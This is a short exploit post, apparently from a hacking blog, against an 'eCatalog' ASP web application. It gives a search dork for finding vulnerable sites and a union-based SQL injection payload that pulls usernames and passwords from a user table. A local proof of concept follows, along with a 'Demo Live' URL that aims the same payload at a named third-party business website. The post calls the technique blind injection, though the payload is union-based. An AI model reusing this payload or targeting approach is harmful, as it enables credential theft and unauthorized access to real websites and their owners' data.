[Blind Sql Injection] eCatalog | S4N - Soft4Newbie
————————————————————————————————————————————————————-
S4N - Soft4Newbie |
[-] Dork
[+] “catalog/details.asp?id=” or use your own keyword
[-] Exploit
[+] details.asp?id=[id]+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user
[-] POC
http://127.0.0.1/catalog/details.asp?id=706+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user
[-] Demo Live
http://www.honourfurniture.com.my/catalog/details.asp?id=771+union+select 1,2,3,4,5,6,username,8,9,10,11,12,13,password from user
Posting Komentar